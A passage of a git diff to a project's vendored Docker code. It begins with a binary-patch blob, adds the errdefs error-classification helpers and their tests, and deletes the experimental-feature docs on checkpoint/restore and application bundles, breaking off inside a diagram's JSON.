zLS`bXaz?ENZHy2cyP-d`ZQU7K?y@U z3rO&(^z1Hu4Mt^Q$ylLhC!pYVrjHtB;fz{_#Bp?+MO165mvxspK^uX;4%oypZT23= zMX_o>)*zll!>$*~Iw8~spD3Ds#8$~nTHqS%dRv5_)tgZv53DPLoYsD@#cLNoDa+y$ zVos){T>jw0c|zJ@0K_)ahe{q^@8cT!q)4(Z=FaGD6Kwtk{YnkWeaJ48p`IyKWkLD~ zy#dZmv81q{36;|gx5XI`i7?Hq{`x*Y6f|~<{jhANQI9rR9dFk=QDvIHa|b)!jBzIz zwo;Dk@GR*hj#4&T#2`*t- zn6gcS&q)BZVo>>HcZNzd_{3(n4^@_6; z%MA{ObQTYxz!!A2oj0rKpbfS^A=Tmu1iQ)VM&=f*=U7n$%jwzAPQK!7jC)B|G8u%g zitgIG_{L52;2kps8>JBcHCYvk!`Ir2NBN$vE}t#G)w>L}!GN3t98qs}}@gjfebVY3F+SKs6s^+LrsnmTs+h{HB zR-iShZe{E_VAptc-kuRQTXn*mV6=+ee8!A=hSKCFG>#hy=1o*ON!oL`I>d(=T1<@v zi!h7r$X9xrimdLn2KV!iPyp)#+|;JbW;z^Fi~QL(DIlDM%@#A{u^`jNuNFK&njzv~ zM^5Dp$3620J1}?~A^;@CtI7RyWjc0|DN%xO*8wQHJljN2)HNl@E$Og z1jLBWfh^bbgM2JeNnuUDP$lVRVc~u0)dA48cOZuJl6q90T|+2m?ebvMdpQklv2fW% z*#usb-I-7DDei+IwKX>srl3kPlM>GiVvlzjh>b3@Te<`MKz!^=j%usvf&B9 zWRe-UI;kI%iTiTcuCJwDV@(%2rRaOvvGEez1(P5AMn%V}d?tD4E{VoP$w|kE7i~!2 zy;K^@p63O4iv3G}1k^BxB0YGXt)ziPCdXO8TQuXznNJfYZQ*`}z=7AmIx%nOb0sF{ zod5Q6EpH?rZ7j6Yq+KU@iGsr#RJTYFCU1CeltiUhHwRyx{axeQeKq|1#rQgCZjUy& z2`>(3L9&JRqe^vOXgAgv*7?j3KBxu_A>6iizDx!nS;aa2Tu=O zDa`2iuvl5fjcW?kydc92zTEQWlh>|+E{zt=a)z+`vYxM#**~TP742^1+KguYEO-^P zptGYu1H>+3zqG%seS=$H_{!c?XP-9KH@fz#6nT8Lw+%6H@*YCLnZA0ajmP?4Eof8; zJ;ye^YrQRR`>7FikLK`=FLXF|;%zIujmJ6eoMb-iR6isGxR+C_-XUF>BQihL1A7%ygE{TwZpOdtcuB(iaK54kw8OuB>WyIXLILxV0{Ak$F#09_ zubm{w=yN4kW;on&8LI&?e~Y`jcJo@e0S6*(_BrA$(hzy{;giG0MhEg*LnnAll}nU% z)R7|WZC@Kn_shP&JpKMf0LQxzTAGsfF8DOb{%>~MBG65zW3tXkOfe5=`>VlI!O!}S z{9Pd51BEgazLcITt_@JW7aX_2bFnkXOK)n7#O-4yIOY2OLxXKn>-OMLl3dM zhXMW5BFon1q#Wtz*9jAuF8cy*GWw2SjDrKMf(OdKKgUkzW#w8O99J@uPwFPEUB#=aU68Wg&bp( zaL5H_c_58^QCZmJq53z$eElK{-N0P4R?0#SEznthaFayi%`WCS zk{p_rjPL*~1MVnI08c|GHSJLc^dTYWY)qIHDHnCW)ga`Y`IB<%<`)k88vmrB_|Yo* zHjRKIVfu10;ms-YnV20-mY$RcsZqu?ug^+H<<~I@R%WO3bpH$T#Uay0HLdTDR&X|L&a>X2t5^RsV7Sr&0p9YHZ*J%~%joua3^w)i~&YfkH=K>zV%+4uPTZ z_>AX&vnJqLaO6b>R6~1D&fEKaiuku4%7%8nIEQzkohi#UWg%VY3E%sYh?Ja6c!;oe z|ALFOJNf@@S0G=d{VI&y^aOBA^9WvJLm`XWj0+V&aJNcoU92*XXq5F;LMlsEcJy@d 
z&8QzsoSrr`UP(Y6KE@@b3qzNgYt{~QyK-Dh#)n!9x(k_jAcE?7N*mLs2+P%^fj@j* z_P0EeFZqd(bFy$!*sc4>Rh9r_LN{jWZ>r{)Dz~WzK;y8%(@!^(0hvpD@0r6pAb3`) which can be used rather than asserting the interfaces directly. +// If you must assert on these interfaces, be sure to check the causal chain (`err.Cause()`). +package errdefs // import "github.com/docker/docker/errdefs" diff --git a/vendor/github.com/docker/docker/errdefs/helpers.go b/vendor/github.com/docker/docker/errdefs/helpers.go new file mode 100644 index 0000000000..6169c2bc62 --- /dev/null +++ b/vendor/github.com/docker/docker/errdefs/helpers.go @@ -0,0 +1,240 @@ +package errdefs // import "github.com/docker/docker/errdefs" + +import "context" + +type errNotFound struct{ error } + +func (errNotFound) NotFound() {} + +func (e errNotFound) Cause() error { + return e.error +} + +// NotFound is a helper to create an error of the class with the same name from any error type +func NotFound(err error) error { + if err == nil { + return nil + } + return errNotFound{err} +} + +type errInvalidParameter struct{ error } + +func (errInvalidParameter) InvalidParameter() {} + +func (e errInvalidParameter) Cause() error { + return e.error +} + +// InvalidParameter is a helper to create an error of the class with the same name from any error type +func InvalidParameter(err error) error { + if err == nil { + return nil + } + return errInvalidParameter{err} +} + +type errConflict struct{ error } + +func (errConflict) Conflict() {} + +func (e errConflict) Cause() error { + return e.error +} + +// Conflict is a helper to create an error of the class with the same name from any error type +func Conflict(err error) error { + if err == nil { + return nil + } + return errConflict{err} +} + +type errUnauthorized struct{ error } + +func (errUnauthorized) Unauthorized() {} + +func (e errUnauthorized) Cause() error { + return e.error +} + +// Unauthorized is a helper to create an error of the class with the same name from any error type +func 
Unauthorized(err error) error { + if err == nil { + return nil + } + return errUnauthorized{err} +} + +type errUnavailable struct{ error } + +func (errUnavailable) Unavailable() {} + +func (e errUnavailable) Cause() error { + return e.error +} + +// Unavailable is a helper to create an error of the class with the same name from any error type +func Unavailable(err error) error { + return errUnavailable{err} +} + +type errForbidden struct{ error } + +func (errForbidden) Forbidden() {} + +func (e errForbidden) Cause() error { + return e.error +} + +// Forbidden is a helper to create an error of the class with the same name from any error type +func Forbidden(err error) error { + if err == nil { + return nil + } + return errForbidden{err} +} + +type errSystem struct{ error } + +func (errSystem) System() {} + +func (e errSystem) Cause() error { + return e.error +} + +// System is a helper to create an error of the class with the same name from any error type +func System(err error) error { + if err == nil { + return nil + } + return errSystem{err} +} + +type errNotModified struct{ error } + +func (errNotModified) NotModified() {} + +func (e errNotModified) Cause() error { + return e.error +} + +// NotModified is a helper to create an error of the class with the same name from any error type +func NotModified(err error) error { + if err == nil { + return nil + } + return errNotModified{err} +} + +type errAlreadyExists struct{ error } + +func (errAlreadyExists) AlreadyExists() {} + +func (e errAlreadyExists) Cause() error { + return e.error +} + +// AlreadyExists is a helper to create an error of the class with the same name from any error type +func AlreadyExists(err error) error { + if err == nil { + return nil + } + return errAlreadyExists{err} +} + +type errNotImplemented struct{ error } + +func (errNotImplemented) NotImplemented() {} + +func (e errNotImplemented) Cause() error { + return e.error +} + +// NotImplemented is a helper to create an error of the class 
with the same name from any error type +func NotImplemented(err error) error { + if err == nil { + return nil + } + return errNotImplemented{err} +} + +type errUnknown struct{ error } + +func (errUnknown) Unknown() {} + +func (e errUnknown) Cause() error { + return e.error +} + +// Unknown is a helper to create an error of the class with the same name from any error type +func Unknown(err error) error { + if err == nil { + return nil + } + return errUnknown{err} +} + +type errCancelled struct{ error } + +func (errCancelled) Cancelled() {} + +func (e errCancelled) Cause() error { + return e.error +} + +// Cancelled is a helper to create an error of the class with the same name from any error type +func Cancelled(err error) error { + if err == nil { + return nil + } + return errCancelled{err} +} + +type errDeadline struct{ error } + +func (errDeadline) DeadlineExceeded() {} + +func (e errDeadline) Cause() error { + return e.error +} + +// Deadline is a helper to create an error of the class with the same name from any error type +func Deadline(err error) error { + if err == nil { + return nil + } + return errDeadline{err} +} + +type errDataLoss struct{ error } + +func (errDataLoss) DataLoss() {} + +func (e errDataLoss) Cause() error { + return e.error +} + +// DataLoss is a helper to create an error of the class with the same name from any error type +func DataLoss(err error) error { + if err == nil { + return nil + } + return errDataLoss{err} +} + +// FromContext returns the error class from the passed in context +func FromContext(ctx context.Context) error { + e := ctx.Err() + if e == nil { + return nil + } + + if e == context.Canceled { + return Cancelled(e) + } + if e == context.DeadlineExceeded { + return Deadline(e) + } + return Unknown(e) +} diff --git a/vendor/github.com/docker/docker/errdefs/helpers_test.go b/vendor/github.com/docker/docker/errdefs/helpers_test.go new file mode 100644 index 0000000000..f1c88704ca --- /dev/null +++ 
b/vendor/github.com/docker/docker/errdefs/helpers_test.go @@ -0,0 +1,194 @@ +package errdefs // import "github.com/docker/docker/errdefs" + +import ( + "errors" + "testing" +) + +var errTest = errors.New("this is a test") + +type causal interface { + Cause() error +} + +func TestNotFound(t *testing.T) { + if IsNotFound(errTest) { + t.Fatalf("did not expect not found error, got %T", errTest) + } + e := NotFound(errTest) + if !IsNotFound(e) { + t.Fatalf("expected not found error, got: %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestConflict(t *testing.T) { + if IsConflict(errTest) { + t.Fatalf("did not expect conflcit error, got %T", errTest) + } + e := Conflict(errTest) + if !IsConflict(e) { + t.Fatalf("expected conflcit error, got: %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestForbidden(t *testing.T) { + if IsForbidden(errTest) { + t.Fatalf("did not expect forbidden error, got %T", errTest) + } + e := Forbidden(errTest) + if !IsForbidden(e) { + t.Fatalf("expected forbidden error, got: %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestInvalidParameter(t *testing.T) { + if IsInvalidParameter(errTest) { + t.Fatalf("did not expect invalid argument error, got %T", errTest) + } + e := InvalidParameter(errTest) + if !IsInvalidParameter(e) { + t.Fatalf("expected invalid argument error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestNotImplemented(t *testing.T) { + if IsNotImplemented(errTest) { + t.Fatalf("did not expect not implemented error, got %T", errTest) + } + e := NotImplemented(errTest) + if !IsNotImplemented(e) { + t.Fatalf("expected not implemented error, got %T", e) + } + if cause := 
e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestNotModified(t *testing.T) { + if IsNotModified(errTest) { + t.Fatalf("did not expect not modified error, got %T", errTest) + } + e := NotModified(errTest) + if !IsNotModified(e) { + t.Fatalf("expected not modified error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestAlreadyExists(t *testing.T) { + if IsAlreadyExists(errTest) { + t.Fatalf("did not expect already exists error, got %T", errTest) + } + e := AlreadyExists(errTest) + if !IsAlreadyExists(e) { + t.Fatalf("expected already exists error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestUnauthorized(t *testing.T) { + if IsUnauthorized(errTest) { + t.Fatalf("did not expect unauthorized error, got %T", errTest) + } + e := Unauthorized(errTest) + if !IsUnauthorized(e) { + t.Fatalf("expected unauthorized error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestUnknown(t *testing.T) { + if IsUnknown(errTest) { + t.Fatalf("did not expect unknown error, got %T", errTest) + } + e := Unknown(errTest) + if !IsUnknown(e) { + t.Fatalf("expected unknown error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestCancelled(t *testing.T) { + if IsCancelled(errTest) { + t.Fatalf("did not expect cancelled error, got %T", errTest) + } + e := Cancelled(errTest) + if !IsCancelled(e) { + t.Fatalf("expected cancelled error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestDeadline(t *testing.T) { + if IsDeadline(errTest) { + t.Fatalf("did not expect 
deadline error, got %T", errTest) + } + e := Deadline(errTest) + if !IsDeadline(e) { + t.Fatalf("expected deadline error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestDataLoss(t *testing.T) { + if IsDataLoss(errTest) { + t.Fatalf("did not expect data loss error, got %T", errTest) + } + e := DataLoss(errTest) + if !IsDataLoss(e) { + t.Fatalf("expected data loss error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestUnavailable(t *testing.T) { + if IsUnavailable(errTest) { + t.Fatalf("did not expect unavaillable error, got %T", errTest) + } + e := Unavailable(errTest) + if !IsUnavailable(e) { + t.Fatalf("expected unavaillable error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} + +func TestSystem(t *testing.T) { + if IsSystem(errTest) { + t.Fatalf("did not expect system error, got %T", errTest) + } + e := System(errTest) + if !IsSystem(e) { + t.Fatalf("expected system error, got %T", e) + } + if cause := e.(causal).Cause(); cause != errTest { + t.Fatalf("causual should be errTest, got: %v", cause) + } +} diff --git a/vendor/github.com/docker/docker/errdefs/is.go b/vendor/github.com/docker/docker/errdefs/is.go new file mode 100644 index 0000000000..e0513331bb --- /dev/null +++ b/vendor/github.com/docker/docker/errdefs/is.go @@ -0,0 +1,114 @@ +package errdefs // import "github.com/docker/docker/errdefs" + +type causer interface { + Cause() error +} + +func getImplementer(err error) error { + switch e := err.(type) { + case + ErrNotFound, + ErrInvalidParameter, + ErrConflict, + ErrUnauthorized, + ErrUnavailable, + ErrForbidden, + ErrSystem, + ErrNotModified, + ErrAlreadyExists, + ErrNotImplemented, + ErrCancelled, + ErrDeadline, + ErrDataLoss, + ErrUnknown: + return err + case causer: + return 
getImplementer(e.Cause()) + default: + return err + } +} + +// IsNotFound returns if the passed in error is an ErrNotFound +func IsNotFound(err error) bool { + _, ok := getImplementer(err).(ErrNotFound) + return ok +} + +// IsInvalidParameter returns if the passed in error is an ErrInvalidParameter +func IsInvalidParameter(err error) bool { + _, ok := getImplementer(err).(ErrInvalidParameter) + return ok +} + +// IsConflict returns if the passed in error is an ErrConflict +func IsConflict(err error) bool { + _, ok := getImplementer(err).(ErrConflict) + return ok +} + +// IsUnauthorized returns if the passed in error is an ErrUnauthorized +func IsUnauthorized(err error) bool { + _, ok := getImplementer(err).(ErrUnauthorized) + return ok +} + +// IsUnavailable returns if the passed in error is an ErrUnavailable +func IsUnavailable(err error) bool { + _, ok := getImplementer(err).(ErrUnavailable) + return ok +} + +// IsForbidden returns if the passed in error is an ErrForbidden +func IsForbidden(err error) bool { + _, ok := getImplementer(err).(ErrForbidden) + return ok +} + +// IsSystem returns if the passed in error is an ErrSystem +func IsSystem(err error) bool { + _, ok := getImplementer(err).(ErrSystem) + return ok +} + +// IsNotModified returns if the passed in error is a NotModified error +func IsNotModified(err error) bool { + _, ok := getImplementer(err).(ErrNotModified) + return ok +} + +// IsAlreadyExists returns if the passed in error is a AlreadyExists error +func IsAlreadyExists(err error) bool { + _, ok := getImplementer(err).(ErrAlreadyExists) + return ok +} + +// IsNotImplemented returns if the passed in error is an ErrNotImplemented +func IsNotImplemented(err error) bool { + _, ok := getImplementer(err).(ErrNotImplemented) + return ok +} + +// IsUnknown returns if the passed in error is an ErrUnknown +func IsUnknown(err error) bool { + _, ok := getImplementer(err).(ErrUnknown) + return ok +} + +// IsCancelled returns if the passed in error is an 
ErrCancelled +func IsCancelled(err error) bool { + _, ok := getImplementer(err).(ErrCancelled) + return ok +} + +// IsDeadline returns if the passed in error is an ErrDeadline +func IsDeadline(err error) bool { + _, ok := getImplementer(err).(ErrDeadline) + return ok +} + +// IsDataLoss returns if the passed in error is an ErrDataLoss +func IsDataLoss(err error) bool { + _, ok := getImplementer(err).(ErrDataLoss) + return ok +} diff --git a/vendor/github.com/docker/docker/experimental/README.md b/vendor/github.com/docker/docker/experimental/README.md deleted file mode 100644 index b57a5d1294..0000000000 --- a/vendor/github.com/docker/docker/experimental/README.md +++ /dev/null @@ -1,44 +0,0 @@ -# Docker Experimental Features - -This page contains a list of features in the Docker engine which are -experimental. Experimental features are **not** ready for production. They are -provided for test and evaluation in your sandbox environments. - -The information below describes each feature and the GitHub pull requests and -issues associated with it. If necessary, links are provided to additional -documentation on an issue. As an active Docker user and community member, -please feel free to provide any feedback on these features you wish. - -## Use Docker experimental - -Experimental features are now included in the standard Docker binaries as of -version 1.13.0. -For enabling experimental features, you need to start the Docker daemon with -`--experimental` flag. -You can also enable the daemon flag via `/etc/docker/daemon.json`. e.g. 
- -```json -{ - "experimental": true -} -``` - -Then make sure the experimental flag is enabled: - -```bash -$ docker version -f '{{.Server.Experimental}}' -true -``` - -## Current experimental features - - * [External graphdriver plugins](../docs/extend/plugins_graphdriver.md) - * [Ipvlan Network Drivers](vlan-networks.md) - * [Docker Stacks and Distributed Application Bundles](docker-stacks-and-bundles.md) - * [Checkpoint & Restore](checkpoint-restore.md) - -## How to comment on an experimental feature - -Each feature's documentation includes a list of proposal pull requests or PRs associated with the feature. If you want to comment on or suggest a change to a feature, please add it to the existing feature PR. - -Issues or problems with a feature? Inquire for help on the `#docker` IRC channel or on the [Docker Google group](https://groups.google.com/forum/#!forum/docker-user). diff --git a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md b/vendor/github.com/docker/docker/experimental/checkpoint-restore.md deleted file mode 100644 index 7e609b60ec..0000000000 --- a/vendor/github.com/docker/docker/experimental/checkpoint-restore.md +++ /dev/null @@ -1,88 +0,0 @@ -# Docker Checkpoint & Restore - -Checkpoint & Restore is a new feature that allows you to freeze a running -container by checkpointing it, which turns its state into a collection of files -on disk. Later, the container can be restored from the point it was frozen. - -This is accomplished using a tool called [CRIU](http://criu.org), which is an -external dependency of this feature. A good overview of the history of -checkpoint and restore in Docker is available in this -[Kubernetes blog post](http://blog.kubernetes.io/2015/07/how-did-quake-demo-from-dockercon-work.html). - -## Installing CRIU - -If you use a Debian system, you can add the CRIU PPA and install with apt-get -[from the criu launchpad](https://launchpad.net/~criu/+archive/ubuntu/ppa). 
- -Alternatively, you can [build CRIU from source](http://criu.org/Installation). - -You need at least version 2.0 of CRIU to run checkpoint/restore in Docker. - -## Use cases for checkpoint & restore - -This feature is currently focused on single-host use cases for checkpoint and -restore. Here are a few: - -- Restarting the host machine without stopping/starting containers -- Speeding up the start time of slow start applications -- "Rewinding" processes to an earlier point in time -- "Forensic debugging" of running processes - -Another primary use case of checkpoint & restore outside of Docker is the live -migration of a server from one machine to another. This is possible with the -current implementation, but not currently a priority (and so the workflow is -not optimized for the task). - -## Using checkpoint & restore - -A new top level command `docker checkpoint` is introduced, with three subcommands: -- `create` (creates a new checkpoint) -- `ls` (lists existing checkpoints) -- `rm` (deletes an existing checkpoint) - -Additionally, a `--checkpoint` flag is added to the container start command. - -The options for checkpoint create: - - Usage: docker checkpoint create [OPTIONS] CONTAINER CHECKPOINT - - Create a checkpoint from a running container - - --leave-running=false Leave the container running after checkpoint - --checkpoint-dir Use a custom checkpoint storage directory - -And to restore a container: - - Usage: docker start --checkpoint CHECKPOINT_ID [OTHER OPTIONS] CONTAINER - - -A simple example of using checkpoint & restore on a container: - - $ docker run --security-opt=seccomp:unconfined --name cr -d busybox /bin/sh -c 'i=0; while true; do echo $i; i=$(expr $i + 1); sleep 1; done' - > abc0123 - - $ docker checkpoint create cr checkpoint1 - - # - $ docker start --checkpoint checkpoint1 cr - > abc0123 - -This process just logs an incrementing counter to stdout. 
If you `docker logs` -in between running/checkpoint/restoring you should see that the counter -increases while the process is running, stops while it's checkpointed, and -resumes from the point it left off once you restore. - -## Current limitation - -seccomp is only supported by CRIU in very up to date kernels. - -External terminal (i.e. `docker run -t ..`) is not supported at the moment. -If you try to create a checkpoint for a container with an external terminal, -it would fail: - - $ docker checkpoint create cr checkpoint1 - Error response from daemon: Cannot checkpoint container c1: rpc error: code = 2 desc = exit status 1: "criu failed: type NOTIFY errno 0\nlog file: /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log\n" - - $ cat /var/lib/docker/containers/eb62ebdbf237ce1a8736d2ae3c7d88601fc0a50235b0ba767b559a1f3c5a600b/checkpoints/checkpoint1/criu.work/dump.log - Error (mount.c:740): mnt: 126:./dev/console doesn't have a proper root mount - diff --git a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md b/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md deleted file mode 100644 index b777c3919c..0000000000 --- a/vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md +++ /dev/null @@ -1,202 +0,0 @@ -# Docker Stacks and Distributed Application Bundles - -## Overview - -Docker Stacks and Distributed Application Bundles are experimental features -introduced in Docker 1.12 and Docker Compose 1.8, alongside the concept of -swarm mode, and Nodes and Services in the Engine API. - -A Dockerfile can be built into an image, and containers can be created from -that image. Similarly, a docker-compose.yml can be built into a **distributed -application bundle**, and **stacks** can be created from that bundle. In that -sense, the bundle is a multi-services distributable image format. 
- -As of Docker 1.12 and Compose 1.8, the features are experimental. Neither -Docker Engine nor the Docker Registry support distribution of bundles. - -## Producing a bundle - -The easiest way to produce a bundle is to generate it using `docker-compose` -from an existing `docker-compose.yml`. Of course, that's just *one* possible way -to proceed, in the same way that `docker build` isn't the only way to produce a -Docker image. - -From `docker-compose`: - -```bash -$ docker-compose bundle -WARNING: Unsupported key 'network_mode' in services.nsqd - ignoring -WARNING: Unsupported key 'links' in services.nsqd - ignoring -WARNING: Unsupported key 'volumes' in services.nsqd - ignoring -[...] -Wrote bundle to vossibility-stack.dab -``` - -## Creating a stack from a bundle - -A stack is created using the `docker deploy` command: - -```bash -# docker deploy --help - -Usage: docker deploy [OPTIONS] STACK - -Create and update a stack from a Distributed Application Bundle (DAB) - -Options: - --file string Path to a Distributed Application Bundle file (Default: STACK.dab) - --help Print usage - --with-registry-auth Send registry authentication details to Swarm agents -``` - -Let's deploy the stack created before: - -```bash -# docker deploy vossibility-stack -Loading bundle from vossibility-stack.dab -Creating service vossibility-stack_elasticsearch -Creating service vossibility-stack_kibana -Creating service vossibility-stack_logstash -Creating service vossibility-stack_lookupd -Creating service vossibility-stack_nsqd -Creating service vossibility-stack_vossibility-collector -``` - -We can verify that services were correctly created: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -29bv0vnlm903 vossibility-stack_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4awt47624qwh vossibility-stack_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 -4tjx9biia6fs 
vossibility-stack_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa -7563uuzr9eys vossibility-stack_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 -9gc5m4met4he vossibility-stack_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe -axqh55ipl40h vossibility-stack_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba -``` - -## Managing stacks - -Stacks are managed using the `docker stack` command: - -```bash -# docker stack --help - -Usage: docker stack COMMAND - -Manage Docker stacks - -Options: - --help Print usage - -Commands: - config Print the stack configuration - deploy Create and update a stack - ls List stacks - rm Remove the stack - services List the services in the stack - tasks List the tasks in the stack - -Run 'docker stack COMMAND --help' for more information on a command. -``` - -## Bundle file format - -Distributed application bundles are described in a JSON format. When bundles -are persisted as files, the file extension is `.dab` (Docker 1.12RC2 tools use -`.dsb` for the file extension—this will be updated in the next release client). - -A bundle has two top-level fields: `version` and `services`. The version used -by Docker 1.12 tools is `0.1`. - -`services` in the bundle are the services that comprise the app. They -correspond to the new `Service` object introduced in the 1.12 Docker Engine API. - -A service has the following fields: - -
-
- Image (required) string -
-
- The image that the service will run. Docker images should be referenced - with full content hash to fully specify the deployment artifact for the - service. Example: - postgres@sha256:f76245b04ddbcebab5bb6c28e76947f49222c99fec4aadb0bb - 1c24821a 9e83ef -
-
- Command []string -
-
- Command to run in service containers. -
-
- Args []string -
-
- Arguments passed to the service containers. -
-
- Env []string -
-
- Environment variables. -
-
- Labels map[string]string -
-
- Labels used for setting meta data on services. -
-
- Ports []Port -
-
- Service ports (composed of Port (int) and - Protocol (string). A service description can - only specify the container port to be exposed. These ports can be - mapped on runtime hosts at the operator's discretion. -
- -
- WorkingDir string -
-
- Working directory inside the service containers. -
- -
- User string -
-
- Username or UID (format: <name|uid>[:<group|gid>]). -
- -
- Networks []string -
-
- Networks that the service containers should be connected to. An entity - deploying a bundle should create networks as needed. -
-
- -The following is an example of bundlefile with two services: - -```json -{ - "Version": "0.1", - "Services": { - "redis": { - "Image": "redis@sha256:4b24131101fa0117bcaa18ac37055fffd9176aa1a240392bb8ea85e0be50f2ce", - "Networks": ["default"] - }, - "web": { - "Image": "dockercloud/hello-world@sha256:fe79a2cfbd17eefc344fb8419420808df95a1e22d93b7f621a7399fd1e9dca1d", - "Networks": ["default"], - "User": "web" - } - } -} -``` diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy deleted file mode 100644 index bf0512af76..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":447,"height":422,"nodeIndex":326,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach 
Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":9,"y":10.461511948529278},"max":{"x":447,"y":421.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":12.0,"y":200.0,"rotation":0.0,"id":276,"width":434.00000000000006,"height":197.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":275.0,"y":8.93295288085936,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":14,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":1.0,"p
x":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[82.0,295.5670471191406],[-4.628896294384617,211.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":285.0,"y":18.93295288085936,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":15,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":316,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":290,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-204.0,285.5670471191406],[-100.37110370561533,201.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":203.5,"rotation":0.0,"id":267,"width":116.0,"he